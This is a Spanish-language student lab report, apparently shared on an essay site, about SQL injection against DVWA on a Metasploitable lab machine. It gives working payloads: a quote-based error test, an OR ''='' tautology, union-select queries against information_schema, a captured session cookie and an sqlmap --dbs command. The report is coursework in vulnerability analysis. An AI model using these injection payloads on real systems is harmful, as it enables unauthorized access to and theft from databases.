ClubEnsayos.com - Ensayos de Calidad, Tareas y Monografias
Buscar

SQL INJECTION DVWA


Enviado por   •  17 de Noviembre de 2020  •  Informe  •  383 Palabras (2 Páginas)  •  445 Visitas

Página 1 de 2

Asignatura

Datos del alumno

Fecha

Análisis de vulnerabilidades

Apellidos: Zapata Aguinaga

 29/05/2020

Nombre: Raúl Gerardo

Actividad: SQL Injection contra DVWA

Manual.

Verificar que los equipos Kali y Metasploitable se encuentran en la misma red.

[pic 1]

[pic 2]

En el navegador FireFox, colocamos la ip del equipo Metaspolitable y se ejecuta DVWA

[pic 3]

Se selecciona el nivel de seguridad y se coloca en low para la actividad

[pic 4]

Se ejecuta SQL Injection y en la caja de texto se coloca la comilla, la cual espera un cierre, si presenta un error de SQL, estaremos ante un desarrollo inseguro, adicionalmente se muestra la comilla en URL y muestra el error de sintaxis en el navegador

[pic 5]

[pic 6]

Si se ingresa el número 1 retorna el usuario al que le corresponde el identificador 1

[pic 7]

Cada usuario tiene un número identificador, con el comando a' OR ''=' tenemos todos los usuarios.

[pic 8]

Con el siguiente query, se obtiene de la tabla usuarios el nombre y la contraseña, utilizando union y concat

' union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name= ‘users’ #

[pic 9]

Se listan los nombres de las bases de datos

' union select null,schema_name from information_schema.schemata #

[pic 10]

SQLMAP

Se instala un analizador de cabeceras en FireFox, ya que es necesario obtener el User-Agent y las cookies de sesión para ejecutar el proceso con SqlMap. Se debe incluir el URL, en este caso el URL que retorna el botón Submit. La opción dbs lista las bases de datos

[pic 11]

Host: 192.168.100.231

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.100.231/dvwa/vulnerabilities/sqli/?id=%27+union+select+null%2Cschema_name+from+information_schema.schemata+%23&Submit=Submit

Connection: keep-alive

Cookie: security=low; PHPSESSID=6bedbfab32551dbc7d580374e74c621e

Upgrade-Insecure-Requests: 1

Con el siguiente comando se obtienen los nombres de las bases de datos

sqlmap --headers="Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" --cookie="security=low; PHPSESSID=6bedbfab32551dbc7d580374e74c621e" -u "http://192.168.100.231/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" –dbs

...

Descargar como (para miembros actualizados) txt (3 Kb) pdf (1 Mb) docx (975 Kb)
Leer 1 página más »
Disponible sólo en Clubensayos.com